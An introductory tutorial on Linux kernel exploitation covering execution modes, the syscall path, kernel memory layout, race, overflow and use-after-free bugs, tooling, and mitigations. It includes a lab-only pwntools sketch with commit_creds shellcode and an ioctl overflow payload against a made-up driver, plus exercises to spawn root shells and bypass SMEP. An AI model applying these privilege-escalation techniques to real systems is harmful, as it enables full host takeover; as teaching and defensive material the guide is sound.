Linux Kernel Exploitation Fundamentals: Introductory Guide

Introduction

Linux kernel exploitation is the art and science of abusing bugs in the privileged part of the operating system to gain arbitrary code execution with kernel (root) privileges. It sits at the apex of privilege escalation: once you have a kernel foothold, you can bypass any user-space restriction, modify security mechanisms, and obtain full control of the host.

Understanding kernel exploitation is crucial for red-teamers, bug-bounty hunters, and defensive engineers alike. Modern attack surfaces - container escapes, hypervisor breakouts, and firmware compromises - often begin with a kernel vulnerability.

Real-world relevance: CVE-2021-3493 (a local privilege escalation in the OverlayFS implementation shipped in Ubuntu kernels) and CVE-2022-0185 (a heap buffer overflow in the filesystem context code, legacy_parse_param) both demonstrated how a single kernel bug can put a large installed base of servers at risk.

Prerequisites

Solid grasp of Linux Privilege Escalation Fundamentals, especially SUID/SGID binary exploitation.
Familiarity with Linux Capabilities Abuse - knowing how capabilities can be dropped or retained.
Basic C programming, assembly, and debugging experience.
Comfort with Linux command line tools (grep, awk, etc.).

Core Concepts

Before diving into the subtopics, we need to internalize a few overarching ideas:

Ring Levels & Execution Modes: The CPU runs in user mode (Ring 3) for applications and kernel mode (Ring 0) for privileged code. Transition is mediated by system calls, interrupts, and exceptions.
Kernel Isolation: Modern kernels employ mitigations such as KASLR (Kernel Address Space Layout Randomization), SMEP (blocks kernel-mode execution of user-space pages), SMAP (blocks kernel-mode access to user-space pages outside explicit user-access windows), and read-only data sections.
Attack Surface: Anything that crosses the user↔kernel boundary (syscalls, ioctl, procfs, sysfs, netlink) is a potential entry point.
Exploit Primitive: Most kernel exploits rely on gaining arbitrary read/write in kernel memory, then hijacking control flow (e.g., via function pointer overwrite or return-oriented programming).
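
SMEP and SMAP are switched on through bits in the CR4 control register. As a small illustration, assuming a CR4 value copied out of a debugger (the example value below is made up, and the function name is illustrative), this sketch decodes the relevant bits:

```python
# Bit positions of selected CR4 protection flags on x86.
CR4_BITS = {"UMIP": 11, "SMEP": 20, "SMAP": 21}


def decode_cr4(value: int) -> dict:
    """Report which of the listed CR4 protection bits are set."""
    return {name: bool((value >> bit) & 1) for name, bit in CR4_BITS.items()}


# Hypothetical CR4 value, e.g. as shown by a debugger attached to a QEMU guest.
example_cr4 = 0x3006F0
print(decode_cr4(example_cr4))
```

A cleared SMEP or SMAP bit in a lab VM usually means the emulated CPU model does not advertise the feature.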

Below we break each subtopic down with diagrams described in text, concrete code snippets, and practical tips.

Kernel architecture and execution modes

The Linux kernel is a monolithic design: a single binary image that contains core subsystems (scheduler, memory manager, networking, filesystems) and device drivers. Execution modes are:

User mode (Ring 3): All regular processes run here. Direct access to privileged instructions is prohibited.
Kernel mode (Ring 0): Syscall entry code (entry_SYSCALL_64 on x86_64), interrupt handlers, and all other kernel code run here.
Interrupt context: Kernel-mode code executed in response to hardware or software interrupts; it is kept short and must not sleep.

Diagram (textual):

+-------------------+   System Call   +-------------------+
|   User Process    | --------------> |   Kernel Entry    |
|     (Ring 3)      | <-------------- |     (Ring 0)      |
+-------------------+     Return      +-------------------+

Key points for exploit developers:

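All kernel code, including drivers, shares a single kernel virtual address space; unlike in micro-kernels, there is no isolation between kernel components, so a bug in any driver can corrupt any kernel data.
When a syscall is invoked on x86_64, the syscall instruction saves the user RIP in RCX and RFLAGS in R11 and jumps to entry_SYSCALL_64; the entry code then runs swapgs, switches to the calling thread's kernel stack, and pushes the user registers there as a struct pt_regs.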
Understanding the stack layout (saved registers, pt_regs) is essential when crafting stack-based payloads.
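
The saved register frame can be modelled with ctypes to look up field offsets. This is a sketch that assumes the x86_64 struct pt_regs field order from arch/x86/include/asm/ptrace.h; the class and helper names are illustrative:

```python
import ctypes


class PtRegs(ctypes.Structure):
    """Model of the x86_64 register frame saved at kernel entry (assumed order)."""
    _fields_ = [(name, ctypes.c_uint64) for name in (
        "r15", "r14", "r13", "r12", "bp", "bx",            # callee-saved
        "r11", "r10", "r9", "r8", "ax", "cx", "dx", "si", "di",
        "orig_ax",                                          # syscall number
        "ip", "cs", "flags", "sp", "ss",                    # iret-style frame
    )]


def field_offsets() -> dict:
    """Map each field name to its byte offset inside the frame."""
    return {name: getattr(PtRegs, name).offset for name, _ in PtRegs._fields_}


offsets = field_offsets()
print(ctypes.sizeof(PtRegs), offsets["ip"], offsets["sp"])
```

The last five fields mirror the frame that iretq consumes, which is why the saved ip, cs, flags, sp, and ss sit together at the top of the structure.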

System call interface and entry points

System calls are the primary user↔kernel gateway. The table sys_call_table maps syscall numbers to kernel function pointers. An attacker can abuse a vulnerable syscall or ioctl to trigger the bug.

Example of enumerating the syscall table address (requires root or a leak):

$ sudo cat /proc/kallsyms | grep " sys_call_table"
ffffffff81a001c0 R sys_call_table
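
The same lookup can be scripted. A minimal sketch, assuming the usual three-column kallsyms format (address, type, name); the sample text and function names are illustrative, and an all-zero result indicates that the kernel is hiding addresses from the reader:

```python
def parse_kallsyms(text: str) -> dict:
    """Parse kallsyms-style lines into {symbol name: address}."""
    symbols = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        addr, _sym_type, name = parts[0], parts[1], parts[2]
        symbols.setdefault(name, int(addr, 16))  # keep the first occurrence
    return symbols


def addresses_hidden(symbols: dict) -> bool:
    """True when every address reads as zero (restricted, unprivileged view)."""
    return bool(symbols) and all(addr == 0 for addr in symbols.values())


# Illustrative sample; on a real system read /proc/kallsyms instead.
SAMPLE = """\
ffffffff810a1420 T commit_creds
ffffffff810a1810 T prepare_kernel_cred
ffffffff81a001c0 R sys_call_table
"""
table = parse_kallsyms(SAMPLE)
print(hex(table["sys_call_table"]), addresses_hidden(table))
```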

Typical flow of a syscall on x86_64:

; Userland
mov rax, 0x3b ; execve syscall number
lea rdi, [rip+cmd] ; pointer to "/bin/sh"
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
syscall ; transition to kernel

; Kernel entry (simplified)
entry_SYSCALL_64:
    swapgs                      ; load kernel GS base
    SAVE_REGS                   ; push user registers onto kernel stack
    call *sys_call_table[rax]
    RESTORE_REGS                ; pop registers back to userland
    swapgs
    sysretq
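
The same user-to-kernel transition can be observed from a script without writing assembly. A minimal sketch, assuming Linux and a libc that exports syscall(); the helper name and the small per-architecture table of getpid numbers are illustrative:

```python
import ctypes
import os
import platform

# getpid syscall numbers for two common architectures (assumed table).
GETPID_NR = {"x86_64": 39, "aarch64": 172}


def raw_getpid() -> int:
    """Invoke getpid through libc's generic syscall() wrapper."""
    nr = GETPID_NR[platform.machine()]
    libc = ctypes.CDLL(None, use_errno=True)
    libc.syscall.restype = ctypes.c_long
    return libc.syscall(ctypes.c_long(nr))


print(raw_getpid(), os.getpid())
```

Both values come from the same kernel handler; the only difference is whether the syscall number is supplied by hand or by the library wrapper.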

Exploiting a buggy syscall often involves:

Triggering the vulnerable path (e.g., passing a crafted pointer to ioctl).
Escalating the primitive (e.g., leaking a kernel address to defeat KASLR).
Hijacking control flow (overwriting a function pointer, return address, or using a ROP chain).

Memory layout: kernel text, data, heap, and stacks

The kernel address space is divided into several regions:

Text (code): Read-only executable segment. On x86_64 the kernel image is mapped inside the 0xffffffff80000000-0xffffffff9fffffff window; without KASLR, text starts at 0xffffffff81000000. Contains the core kernel functions.
ROData: Read-only constants, often placed after text.
Data / BSS: Writable globals, e.g., init_task, cpu_online_mask.
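Heap (kmalloc): Dynamically allocated memory via kmalloc. Managed by the slab allocator (SLUB on most current kernels) and located in the direct map of physical memory rather than next to the kernel image.
Stacks: Each thread has a kernel stack (16 KB on x86_64, allocated from vmalloc space when CONFIG_VMAP_STACK is set). Hardware interrupts and some exceptions run on separate per-CPU stacks.
Modules: Loadable kernel modules (LKMs) reside in a separate region (from 0xffffffffa0000000 on x86_64). Their load addresses are independent of the kernel image base, so locating module gadgets generally needs its own leak.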

Visual layout (textual diagram):

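0xffffffffffffffff  <-- top of kernel address space
|-------------------|
| modules           |  loadable kernel modules, from 0xffffffffa0000000
|-------------------|
| .text             |  kernel image window, from 0xffffffff80000000
| .rodata / .data   |  (512 MB; image base randomized per boot by KASLR)
| .bss              |
|-------------------|
| vmalloc / ioremap |  from 0xffffc90000000000; thread stacks with CONFIG_VMAP_STACK
|-------------------|
| direct map        |  from 0xffff888000000000; kmalloc heap, per-CPU data
|-------------------|
0xffff800000000000  <-- bottom of the kernel half (default bases, 4-level paging)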
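
When reading crash logs or leaks it helps to tell at a glance which region an address belongs to. A minimal sketch, assuming the default x86_64 bases with 4-level paging from the kernel's memory-map documentation (they move when memory randomization is enabled); the region labels and function name are illustrative:

```python
# (label, first address, last address), default x86_64 4-level layout.
REGIONS = [
    ("user",        0x0000000000000000, 0x00007fffffffffff),
    ("direct map",  0xffff888000000000, 0xffffc87fffffffff),
    ("vmalloc",     0xffffc90000000000, 0xffffe8ffffffffff),
    ("kernel text", 0xffffffff80000000, 0xffffffff9fffffff),
    ("modules",     0xffffffffa0000000, 0xfffffffffeffffff),
]


def classify(addr: int) -> str:
    """Return the label of the region containing addr, or 'other'."""
    for label, start, end in REGIONS:
        if start <= addr <= end:
            return label
    return "other"


for sample in (0xffffffff810a1420, 0xffff888012345000, 0xffffc90000010000):
    print(hex(sample), classify(sample))
```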

Key exploitation takeaways:

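Knowing where pt_regs sits on the kernel stack, and where the swapgs/iretq exit path lives in kernel text, helps when overwriting return addresses and returning cleanly to user mode.
Leaking a kernel text pointer (e.g., from procfs or kallsyms) reveals the KASLR slide of the kernel image and enables precise ROP gadget hunting; heap and stack addresses need their own leaks.
Heap grooming (driving kmalloc and kfree indirectly through syscalls) is essential for use-after-free or out-of-bounds exploits.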
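
Turning one leaked text pointer into usable addresses is simple arithmetic. A minimal sketch, assuming the static addresses come from a matching vmlinux and that the slide is 2 MiB aligned (a typical x86_64 default, treated here as an assumption); the leaked value is hypothetical:

```python
KASLR_ALIGN = 0x200000  # assumed alignment of the randomized image base

# Static (non-randomized) addresses, as they would appear in vmlinux.
STATIC = {
    "commit_creds": 0xffffffff810a1420,
    "prepare_kernel_cred": 0xffffffff810a1810,
}


def kaslr_slide(leaked_addr: int, static_addr: int) -> int:
    """Slide = runtime address minus link-time address of the same symbol."""
    slide = leaked_addr - static_addr
    if slide < 0 or slide % KASLR_ALIGN:
        raise ValueError("leak does not match this symbol or this kernel build")
    return slide


def rebase(static_addr: int, slide: int) -> int:
    """Runtime address of any other symbol in the same image."""
    return static_addr + slide


leaked_commit_creds = 0xffffffff9aca1420  # hypothetical info-leak result
slide = kaslr_slide(leaked_commit_creds, STATIC["commit_creds"])
print(hex(slide), hex(rebase(STATIC["prepare_kernel_cred"], slide)))
```

The alignment check is a cheap sanity test: a slide that is not a multiple of the expected alignment usually means the leak belongs to a different symbol or a different kernel build.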

Common kernel vulnerability classes (race conditions, buffer overflows, use-after-free)

Kernel bugs fall into a few well-studied categories. Below we summarise each with a miniature PoC.

1. Race Conditions (TOCTOU)

A Time-of-Check-to-Time-of-Use flaw occurs when the kernel validates a resource, releases the lock, and later uses the resource assuming it is unchanged.

int vulnerable_open(const char __user *filename, int flags)
{
    struct stat st;

    if (stat_user_path(filename, &st) < 0)
        return -ENOENT;
    /* TOCTOU: the file could be replaced here */
    return sys_open(filename, flags);
}

Exploitation tip: pass a path that refers to a harmless file during the stat check, then swap it for a symlink to a privileged file after the check but before open executes.
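
The pattern is easy to reproduce in user space. The following sketch is an analogy, not kernel code: it contrasts a check-then-open sequence with an open-then-check sequence, using a callback (a stand-in for the attacker winning the race) to make the window deterministic. All names are illustrative:

```python
import os
import stat
import tempfile


def check_then_open(path, between=lambda: None):
    """Vulnerable: validate by name, then resolve the name a second time."""
    if not stat.S_ISREG(os.lstat(path).st_mode):
        raise PermissionError("not a regular file")
    between()                    # race window: the path can be swapped here
    with open(path) as f:        # follows whatever the name points to now
        return f.read()


def open_then_check(path, between=lambda: None):
    """Safer: open once, then validate the object behind the descriptor."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        between()                # swapping the name no longer affects fd
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, 4096).decode()
    finally:
        os.close(fd)


def demo():
    with tempfile.TemporaryDirectory() as d:
        secret, target = os.path.join(d, "secret"), os.path.join(d, "input")

        def reset():
            if os.path.lexists(target):
                os.remove(target)
            with open(target, "w") as f:
                f.write("harmless")

        def swap():              # the attacker's move inside the window
            os.remove(target)
            os.symlink(secret, target)

        with open(secret, "w") as f:
            f.write("secret")
        reset()
        leaked = check_then_open(target, swap)
        reset()
        pinned = open_then_check(target, swap)
        return leaked, pinned


print(demo())
```

The fix works because the descriptor pins the object that was validated, which is the same reason kernel code should look a resource up once and operate on that reference.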

2. Buffer Overflows

Classic stack or heap overflow inside kernel code. Example: an unchecked copy from user space.

static long vuln_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    char buf[64];

    /* BUG: copies 128 bytes into a 64-byte buffer */
    if (copy_from_user(buf, (void __user *)arg, 128))
        return -EFAULT;
    /* ... use buf ... */
    return 0;
}

After overflowing buf, the attacker can overwrite adjacent kernel data structures or saved return addresses on the stack.
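
The effect on the frame can be simulated safely in user space. This sketch models a 64-byte buffer followed directly by a saved return address (a simplification: real frames may also hold a canary and a saved frame pointer) and compares an unchecked copy with a length-checked one. All names and values are illustrative:

```python
BUF_SIZE = 64
ORIGINAL_RET = 0xffffffff81234567  # made-up return address


def make_frame() -> bytearray:
    """64-byte buffer immediately followed by an 8-byte saved return address."""
    return bytearray(BUF_SIZE) + ORIGINAL_RET.to_bytes(8, "little")


def saved_ret(frame: bytearray) -> int:
    return int.from_bytes(frame[BUF_SIZE:BUF_SIZE + 8], "little")


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimics the bug: the length is never compared with the buffer size."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def checked_copy(frame: bytearray, data: bytes) -> None:
    """Mimics the fix: reject anything larger than the destination buffer."""
    if len(data) > BUF_SIZE:
        raise ValueError("length exceeds buffer size")
    frame[:len(data)] = data


frame = make_frame()
unchecked_copy(frame, b"A" * 72)
print(hex(saved_ret(frame)))
```

In the driver, the equivalent fix is to bound the copy length by sizeof(buf) before calling copy_from_user.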

3. Use-After-Free (UAF)

When the kernel frees an object but continues to reference it, a malicious user can allocate controlled data in its place.

struct foo *f = kmalloc(sizeof(*f), GFP_KERNEL);
/* ... */
kfree(f);
/* later */
if (f->enabled)    /* UAF: f may now point to attacker-controlled memory */
    do_something();

Exploitation strategy: spray the heap with objects of known layout (e.g., msg_msg structures via System V message queues) to occupy the freed slot, then trigger the use.

Each class often requires a combination of primitive leakage (infoleak) and heap grooming to turn into full kernel code execution.
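
Why a freed slot tends to be handed back to the next same-sized request can be shown with a toy model. This is a deliberately simplified sketch: it assumes the common general-purpose kmalloc size classes and a plain last-in-first-out free list, and ignores per-CPU caches, freelist randomization, and hardening. Class and method names are illustrative:

```python
KMALLOC_SIZES = (8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192)


def cache_for(size: int) -> int:
    """Smallest general-purpose cache that fits a request of `size` bytes."""
    return next(s for s in KMALLOC_SIZES if s >= size)


class ToySlab:
    def __init__(self):
        self.freelists = {}   # cache size -> stack of free slot ids (LIFO)
        self.slots = {}       # slot id -> (cache size, contents)

    def kmalloc(self, size, contents):
        cache = cache_for(size)
        free = self.freelists.setdefault(cache, [])
        slot = free.pop() if free else len(self.slots)
        self.slots[slot] = (cache, contents)
        return slot

    def kfree(self, slot):
        cache, _ = self.slots[slot]
        self.freelists.setdefault(cache, []).append(slot)  # contents stay in place

    def read(self, slot):
        return self.slots[slot][1]


heap = ToySlab()
victim = heap.kmalloc(56, "struct foo")        # lands in the 64-byte cache
heap.kfree(victim)                             # dangling reference remains
spray = heap.kmalloc(64, "attacker bytes")     # same cache, same slot
print(victim == spray, heap.read(victim))
```

The point for grooming is that the replacement object must fall into the same cache as the victim, which is why spray objects with a controllable size are popular.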

Tools for kernel analysis (objdump, readelf, gdb, crash, pwntools)

Effective exploitation relies on solid tooling.

objdump / readelf: Disassemble the kernel image, list symbols, and locate sections. Both need the uncompressed vmlinux ELF; /boot/vmlinuz-* is a compressed boot image that they cannot parse directly.

$ objdump -d vmlinux | less
$ readelf -s vmlinux | grep " sys_call_table"

gdb (with vmlinux): Debug the kernel in QEMU or via kgdb. Use target remote :1234 to attach.
```
(gdb) file vmlinux
(gdb) target remote :1234
(gdb) break do_sys_open
(gdb) continue
```
crash: A specialized kernel debugging tool that can analyze a live system or core dump.
```
$ crash /usr/lib/debug/lib/modules/$(uname -r)/vmlinux /proc/kcore
crash> bt
```
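pwntools: Python framework for rapid exploit prototyping. It is aimed mainly at user-space targets, but its ELF class can parse kernel symbols from vmlinux and its packing helpers are handy for building payloads.
```
from pwn import *
vmlinux = ELF('./vmlinux', checksec=False)  # uncompressed image with symbols
commit_creds = vmlinux.symbols['commit_creds']
payload = b'A'*64 + p64(commit_creds)  # overwrite function ptr
print(hex(commit_creds), payload.hex())
```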

Tip: keep a local copy of vmlinux (the uncompressed ELF with symbols) for each kernel version you target. It dramatically speeds up static analysis.
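
A quick way to confirm that a saved image is an uncompressed ELF rather than a compressed boot image is to check its magic bytes. A minimal sketch; the helper names are illustrative and the temporary files stand in for real kernel images:

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"


def looks_like_elf(path: str) -> bool:
    """True when the file starts with the ELF magic number."""
    with open(path, "rb") as f:
        return f.read(4) == ELF_MAGIC


def write_temp(data: bytes) -> str:
    """Write data to a fresh temporary file and return its path."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


elf_like = write_temp(ELF_MAGIC + b"\x02\x01\x01" + bytes(9))
not_elf = write_temp(b"not an ELF header")
print(looks_like_elf(elf_like), looks_like_elf(not_elf))
os.remove(elf_like)
os.remove(not_elf)
```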

Basic exploit development workflow for kernel bugs

1. Identify the entry point: Locate the vulnerable syscall/ioctl/path.
2. Obtain a primitive: Leak a kernel address (defeat KASLR) or achieve arbitrary read/write.
3. Craft a reliable primitive: Use heap grooming, race exploitation, or corrupted object reuse.
4. Build a payload: ROP chain, function-pointer overwrite, or a direct commit_creds(prepare_kernel_cred(0)) call. Recent kernels (6.2 and later) reject a NULL argument to prepare_kernel_cred, so payloads there commit init_cred instead.
5. Test in a VM: Use QEMU/KVM with snapshotting to iterate quickly.
6. Bypass mitigations: SMEP and SMAP are CR4 bits that recent kernels pin, so payloads usually stay inside kernel text via ROP and return to user mode through the kernel's own KPTI-aware swapgs/iretq exit path.
7. Deliver & gain root: Trigger the bug, execute payload, spawn a root shell.

Practical Examples

Below we walk through a simplified ioctl buffer overflow that leads to a commit_creds payload.

Step 1 - Locate the vulnerable driver

$ lsmod | grep vuln_driver
vuln_driver 16384 0

Device node: /dev/vuln. The driver implements vuln_ioctl that copies 256 bytes from user space into a 128-byte kernel buffer.

Step 2 - Build the overflow payload

We need the address of commit_creds and prepare_kernel_cred. Leak them via /proc/kallsyms (real addresses are shown only to privileged readers, e.g. those with CAP_SYSLOG when kptr_restrict=1) or via a separate info-leak.

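from pwn import *
import fcntl
import os

# Lab-only sketch: assumes a QEMU guest with KASLR, SMEP, SMAP and KPTI all
# disabled, and a driver built without stack canaries.
# Assume we already have the addresses
commit_creds = 0xffffffff810a1420
prepare_kernel_cred = 0xffffffff810a1810

# Shellcode: call commit_creds(prepare_kernel_cred(0))
# In x86_64 assembly
sc = (
    b"\x48\xc7\xc7\x00\x00\x00\x00"                       # mov rdi, 0
    b"\x48\xb8" + p64(prepare_kernel_cred) + b"\xff\xd0"  # movabs rax, prepare_kernel_cred; call rax
    b"\x48\x89\xc7"                                       # mov rdi, rax
    b"\x48\xb8" + p64(commit_creds) + b"\xff\xd0"         # movabs rax, commit_creds; call rax
    b"\xcc"                                               # int3 for debugging
)

# The saved RIP must hold an address, not the shellcode bytes themselves.
# SC_ADDR is a placeholder for an executable user-space mapping that holds sc;
# creating that mapping and returning cleanly to user mode are omitted here.
SC_ADDR = 0x10000000
payload = b'A'*136 + p64(SC_ADDR)  # 128-byte buffer + saved RBP, then saved RIP

# The bug is reached through a local ioctl on the device node, not a socket.
VULN_CMD = 0x1337  # placeholder ioctl command number
fd = os.open('/dev/vuln', os.O_RDWR)
fcntl.ioctl(fd, VULN_CMD, payload)

Step 3 - Trigger

$ python3 payload.py

If successful, the process that issued the ioctl will hold UID 0 credentials, and you can read /proc/self/status from that process to confirm.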

Tools & Commands

grep -i "commit_creds" /proc/kallsyms - locate credential functions.
objdump -d vmlinux | grep -i "swapgs" - find useful gadgets.
gdb -q vmlinux - set breakpoints on do_sys_open to monitor execution.
crash /usr/lib/debug/lib/modules/$(uname -r)/vmlinux /proc/kcore - inspect live kernel memory (pass a vmcore dump instead of /proc/kcore for post-crash analysis).
pwn asm -c amd64 "xor edi, edi; mov rax, 0xffffffff810a1420; call rax" - assemble inline shellcode.

Defense & Mitigation

From a defender's viewpoint, the goal is to raise the bar so that a kernel bug cannot be turned into arbitrary code execution.

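KASLR: Randomizes the base address of the kernel image (CONFIG_RANDOMIZE_BASE); CONFIG_RANDOMIZE_MEMORY additionally randomizes the direct map, vmalloc, and vmemmap bases.
Read-only kernel memory: CONFIG_STRICT_KERNEL_RWX keeps text and rodata non-writable and data non-executable, and __ro_after_init marks selected data read-only after boot (RELRO is the user-space analogue).
Stack canaries (CONFIG_STACKPROTECTOR, formerly CONFIG_CC_STACKPROTECTOR): Detect overflows before function return.
Use-after-free hardening: CONFIG_DEBUG_SLAB and CONFIG_SLUB_DEBUG add poisoning for debugging; CONFIG_SLAB_FREELIST_HARDENED, CONFIG_SLAB_FREELIST_RANDOM, and init_on_free=1 raise the bar in production.
SMEP/SMAP: Prevent the kernel from executing (SMEP) or accessing (SMAP) user-space pages; ensure they are enabled (default on modern distros and CPUs).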
Audit and fuzz: Employ syzkaller or Trinity to discover bugs early.

Patch management is still the most effective mitigation - keep kernels up-to-date.
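
A first-pass audit of a host can be scripted from two procfs files. A minimal sketch, assuming the text of /proc/cpuinfo and /proc/cmdline is passed in as strings; the function name and report keys are illustrative, and the result only reflects CPU feature flags and boot options, not the full kernel configuration:

```python
def mitigation_report(cpuinfo: str, cmdline: str) -> dict:
    """Summarize a few mitigation-related facts from procfs text."""
    flags = set()
    for line in cpuinfo.splitlines():
        if line.startswith("flags"):
            flags = set(line.split(":", 1)[1].split())
            break
    opts = set(cmdline.split())
    return {
        "smep_available": "smep" in flags,
        "smap_available": "smap" in flags,
        "kaslr_disabled_at_boot": "nokaslr" in opts,
        "pti_disabled_at_boot": bool({"nopti", "pti=off"} & opts),
    }


# Illustrative inputs; on a real host read the two procfs files instead.
SAMPLE_CPUINFO = "processor\t: 0\nflags\t\t: fpu vme smep smap\n"
SAMPLE_CMDLINE = "BOOT_IMAGE=/vmlinuz ro quiet nokaslr"
print(mitigation_report(SAMPLE_CPUINFO, SAMPLE_CMDLINE))
```

A lab VM will typically show the opposite of what a production host should: missing smep/smap flags and nokaslr on the command line.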

Common Mistakes

Assuming static addresses: Forgetting KASLR leads to non-functional payloads.
Skipping heap grooming: Directly exploiting a UAF without preparing the heap often fails.
Overlooking SMEP/SMAP: Trying to execute shellcode in user memory while SMEP is enabled results in a page fault (#PF) and a kernel oops.
Using wrong calling convention: 64-bit kernel functions use the standard System V AMD64 ABI (arguments in rdi, rsi, rdx, ...), while 32-bit x86 kernels pass the first three arguments in eax, edx, and ecx (regparm(3)).
Testing only on a custom kernel: Distro kernels differ in compiler flags (e.g., -fstack-protector-strong) and configuration, which can invalidate an exploit that works on a custom build.

Real-World Impact

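Kernel exploits are among the most severe vulnerability classes. Local privilege escalations are typically rated High in CVSS because they need local access, while remotely reachable kernel bugs can reach Critical scores of 9.8 or more. They enable: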

Escalation from a low-privileged container to the host (e.g., Docker breakout via OverlayFS).
Persistence by installing a rootkit in kernel space, invisible to user-land tools.
Cross-tenant attacks in cloud environments, where containers share the host kernel and KVM guests depend on the host kernel acting as hypervisor.

Case study (hypothetical): An attacker gains a foothold on a multi-tenant Kubernetes node by exploiting a race condition in the cgroup subsystem. By chaining the race with a commit_creds payload, they obtain root on the host and pivot to other pods, exfiltrating secrets.

My experience shows that most successful kernel exploits combine a classic primitive (e.g., arbitrary write) with a modern bypass (e.g., a kernel-only ROP chain that avoids touching user pages under SMEP/SMAP and returns through the KPTI-aware exit path). Staying current on mitigation trends (e.g., KPTI, CR4 pinning, RSB-filling) is essential for both attackers and defenders.

Practice Exercises

Info-leak lab: Write a small kernel module that exposes a /proc entry leaking the address of init_task. Use it to defeat KASLR.
Stack overflow challenge: Compile a vulnerable driver that copies 256 bytes into a 64-byte buffer. Develop an exploit that overwrites the saved RIP and spawns a root shell.
Use-After-Free grooming: Use System V message queues to spray the heap, then trigger a UAF in a crafted driver. Verify you can control a function pointer.
SMEP bypass: Create a payload that uses a kernel ROP chain to disable SMEP temporarily, then execute user-space shellcode.

All labs should be executed inside an isolated QEMU VM with snapshots for quick rollback.

Summary

Kernel exploitation blends deep OS knowledge with low-level binary skills. Mastery of the kernel’s memory layout, system-call entry points, and common vulnerability patterns enables you to turn a simple bug into full system compromise. Coupled with a solid toolset (objdump, gdb, crash, pwntools) and an awareness of modern mitigations, you can both develop powerful exploits and design robust defenses.

Key takeaways:

Know the execution flow from user-space syscall to kernel handler.
Map the kernel address space: text, data, heap, stacks, modules.
Identify the primitive a bug gives you (read/write, arbitrary code).
Use reliable tooling and automate repetitive steps with pwntools.
Always consider mitigations - KASLR, SMEP, stack canaries - and plan bypasses early.
